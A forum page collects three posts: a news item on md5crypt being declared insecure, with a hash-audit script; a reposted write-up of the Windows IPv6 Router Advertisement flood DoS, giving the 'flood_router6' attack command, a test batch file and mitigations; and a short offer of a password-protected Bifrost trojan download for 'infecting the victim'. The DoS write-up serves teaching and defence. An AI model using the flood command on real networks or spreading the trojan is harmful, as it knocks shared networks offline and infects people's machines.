Popular Content

Showing content with the highest reputation on 06/09/12 in all areas

  1. THE AUTHOR of md5crypt(), which is used to encrypt passwords on some FreeBSD and Linux-based operating systems, has said it is no longer secure despite being recommended as a password hashing function.

     Poul-Henning Kamp implemented Ronald Rivest's MD5 one-way hashing algorithm in his md5crypt() function that has been in use on FreeBSD and Linux-based operating systems for many years. Now Kamp has been forced to say that md5crypt() is no longer secure (Md5crypt Password scrambler is no longer considered safe by author — PHKs Bikeshed) after he claimed that people were still recommending it for production use.

     While Kamp introduced extra functionality in md5crypt() to mitigate against brute-force attacks, processing power has increased to a point where Kamp said that md5crypt() is too fast on commercially available hardware. He told The INQUIRER, "[The] only problem with md5crypt is speed: it's too fast."

     Kamp also told The INQUIRER that it had been known for some time that md5crypt() could no longer provide adequate protection, but since people were still recommending the use of md5crypt() in production environments that forced him to make an announcement, urging people to stop using his creation.

     While MD5 was cracked using brute force methods back in 2005, Kamp included extra stages in md5crypt() such as salting to increase its computational complexity, and md5crypt() remained too processor intensive for brute force attacks for a while longer. However md5crypt() is the best part of two decades old by now and more computing power, especially with GPGPUs, has meant that hackers can execute md5crypt() on every combination of 10 letters and numbers in a matter of hours.

     All hashing algorithms eventually become susceptible to brute-force attacks due to advances in computational power. However the fact that Kamp has been forced to make such an announcement shows that bad practices are still far too common, and that can cost people in terms of security.
     Source: Even The Author Says md5crypt() Is No Longer Secure - Packet Storm
    1 point
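For anyone acting on the announcement above, the first step is finding which accounts still hold md5crypt hashes. The following is an added example, not code from the article or from Kamp: it classifies the password field of shadow-format lines by crypt(3) prefix (`$1$` is md5crypt). The sample lines, salts and hashes are constructed placeholders.

```python
import re

# crypt(3) modular-format prefixes; "$1$" is md5crypt, the scheme the article is about.
SCHEMES = [
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^\$2[abxy]?\$"), "bcrypt"),
    (re.compile(r"^\$5\$"), "sha256crypt"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
]

# Constructed sample in /etc/shadow layout; salts and hashes are made-up placeholders.
SAMPLE_SHADOW = """\
root:$6$c29tZXNhbHQ$PLACEHOLDERHASH:15500:0:99999:7:::
alice:$1$abcdefgh$PLACEHOLDERHASH:15400:0:99999:7:::
backup:!$1$ijklmnop$PLACEHOLDERHASH:15100:0:99999:7:::
www-data:*:15000:0:99999:7:::
bob:$2y$10$PLACEHOLDERSALTANDHASH:15450:0:99999:7:::
"""

def classify(field):
    """Map a shadow password field to (scheme, locked)."""
    locked = field.startswith(("!", "*"))
    stored = field.lstrip("!*")          # a locked account can still carry a hash
    if not stored:
        return ("none", locked)
    for pattern, name in SCHEMES:
        if pattern.match(stored):
            return (name, locked)
    return ("des-or-unknown", locked)

def audit(shadow_text):
    """Group accounts by hashing scheme: {scheme: [(user, locked), ...]}."""
    report = {}
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or line.startswith("#"):
            continue                     # skip blank, comment and malformed lines
        scheme, locked = classify(parts[1])
        report.setdefault(scheme, []).append((parts[0], locked))
    return report

def md5crypt_accounts(shadow_text):
    """Accounts whose stored hash must be replaced (password change or forced reset)."""
    return audit(shadow_text).get("md5crypt", [])
```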
  2. Get ready, you have a lot to read plus references, but there is plenty to learn: vulnerable IPv6, a vulnerability so big that an attacker can stop all the PCs on the network, Xbox, PS3, FreeBSD, Win8, with just a .html web page; a very well described presentation by Sam Bowne. Have fun.

     Executive Summary

     This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown.

     A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

     Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

     Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN!

     As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Marc Heuse* that they don't intend to patch this.

     Responsible Disclosure

     I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately.
     However, they informed me that this is not a new attack--it has been publicly known for months:

     Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt
     Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability
     CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD)

     Mitigation

     There is no patch from Microsoft. But there are four ways I know of to protect your computers:

     • Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you.
     • Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below.
     • Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below.
     • Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator

     Added 5-30-2011: Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation:
     Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html
     Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator

     Turning Off Router Discovery

     I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

         netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

     I found that solution here: IPv6: stateless autoconfiguration / manual configuration

     Blocking Rogue Router Advertisements with Windows Firewall

     This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense.

     To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page.

     In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page.

     The Attack

         cd /pentest/spoofing/thc-ipv6
         ./flood_router6 eth0
         Ctrl+C

     Result

     Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C.
     Then with IPCONFIG you can see the effect on the target.

     Batch File to Test for Vulnerability

     On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

         ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY
         @ECHO OFF
         REM Give this host a test address and enable router discovery on the interface
         netsh int ipv6 set addr "Local Area Connection" dead:1::1/64
         netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled
         REM Publish a test route, pause with ping, then delete it (repeated three times)
         netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
         ping 127.0.0.1 -n 3 -w 1000
         netsh int ipv6 del route dead:407::/64 "Local Area Connection"
         ECHO SENDING ADVERTISEMENT #1 OF 3
         netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
         ping 127.0.0.1 -n 3 -w 1000
         netsh int ipv6 del route dead:408::/64 "Local Area Connection"
         ECHO SENDING ADVERTISEMENT #2 OF 3
         netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
         ping 127.0.0.1 -n 3 -w 1000
         netsh int ipv6 del route dead:409::/64 "Local Area Connection"
         ECHO SENDING ADVERTISEMENT #3 OF 3
         ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead::

     The result on a vulnerable machine:

     Class Projects

     Here are some projects designed for use in schools and demonstrations:

     • Win 7 DoS by RA Packets: Project 8x: Win 7 DoS by RA Packets (20 pts.) -- a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine.
     • Router Advertisements with scapy: Project 9x: Router Advertisements with scapy (20 pts.) -- with scapy, you can craft packets easily so you can try variations of the attack.
     • How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.)
     FreeBSD is Vulnerable Too

     At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below:

     The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine. So I slowed the attack down to approximately 100 RAs per second to capture this image:

     100 RAs per second raised the CPU to 19.9% in my test. I filed a bug report.
     kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use

     We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu Linux and Mac OS X do.

     I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011)

     Windows 8 Developer Preview is Vulnerable Too

     This video was made by Josival Junior--good work!

     Written by Sam Bowne; last modified 12 pm May 30, 2011
     * On April 6 I mistakenly attributed Marc Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.
     6-17-11: Fixed anchor tag error
     9-15-2011: Added Win 8 Developer Preview video

     I hope you learn something from this and don't believe that IPv6 is more secure than IPv4 and that it will revolutionize the world; as the article also says, companies like Microsoft don't intend to do anything about this, and moreover they say this vulnerability has existed for months.

     Source: Win 7 DoS by RA Packets
    1 point
  3. "Tutorial for beginners": Using a trojan step by step, from creating the server to infecting the victim. Program used (Bifrost), included in the archive. Password: daat FileShare Download bifrost.rar
    -1 points